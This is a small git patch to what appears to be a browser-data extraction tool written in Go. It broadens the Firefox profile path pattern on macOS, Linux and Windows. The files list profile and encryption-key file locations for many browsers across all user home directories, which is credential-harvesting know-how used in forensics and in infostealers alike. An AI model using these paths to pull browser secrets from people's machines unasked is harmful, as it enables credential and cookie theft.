From 650a7d58b0150b9e4a72557c23b784d5246fdf3e Mon Sep 17 00:00:00 2001 From: Carlo Mandelli Date: Tue, 2 Feb 2021 08:19:47 +0100 Subject: [PATCH] docs: update firefox path profile --- core/browser_darwin.go | 2 +- core/browser_linux.go | 2 +- core/browser_windows.go | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/core/browser_darwin.go b/core/browser_darwin.go index 3cbe3b6..4a6accc 100644 --- a/core/browser_darwin.go +++ b/core/browser_darwin.go @@ -14,7 +14,7 @@ const ( chromeBetaProfilePath = "/Users/*/Library/Application Support/Google/Chrome Beta/*/" chromiumProfilePath = "/Users/*/Library/Application Support/Chromium/*/" edgeProfilePath = "/Users/*/Library/Application Support/Microsoft Edge/*/" - fireFoxProfilePath = "/Users/*/Library/Application Support/Firefox/Profiles/*.default-release/" + fireFoxProfilePath = "/Users/*/Library/Application Support/Firefox/Profiles/*.default*/" braveProfilePath = "/Users/*/Library/Application Support/BraveSoftware/Brave-Browser/*/" operaProfilePath = "/Users/*/Library/Application Support/com.operasoftware.Opera/" operaGXProfilePath = "/Users/*/Library/Application Support/com.operasoftware.OperaGX/" diff --git a/core/browser_linux.go b/core/browser_linux.go index a8a54eb..37718ca 100644 --- a/core/browser_linux.go +++ b/core/browser_linux.go @@ -11,7 +11,7 @@ import ( ) const ( - fireFoxProfilePath = "/home/*/.mozilla/firefox/*.default-release/" + fireFoxProfilePath = "/home/*/.mozilla/firefox/*.default*/" chromeProfilePath = "/home/*/.config/google-chrome/*/" chromiumProfilePath = "/home/*/.config/chromium/*/" edgeProfilePath = "/home/*/.config/microsoft-edge*/*/" diff --git a/core/browser_windows.go b/core/browser_windows.go index 64f735c..5be9bec 100644 --- a/core/browser_windows.go +++ b/core/browser_windows.go @@ -25,7 +25,7 @@ const ( braveKeyPath = "/AppData/Local/BraveSoftware/Brave-Browser/User Data/Local State" speed360ProfilePath = "/AppData/Local/360chrome/Chrome/User Data/*/" qqBrowserProfilePath = "/AppData/Local/Tencent/QQBrowser/User Data/*/" - firefoxProfilePath = "/AppData/Roaming/Mozilla/Firefox/Profiles/*.default-release/" + firefoxProfilePath = "/AppData/Roaming/Mozilla/Firefox/Profiles/*.default*/" operaProfilePath = "/AppData/Roaming/Opera Software/Opera Stable/" operaKeyPath = "/AppData/Roaming/Opera Software/Opera Stable/Local State" operaGXProfilePath = "/AppData/Roaming/Opera Software/Opera GX Stable/"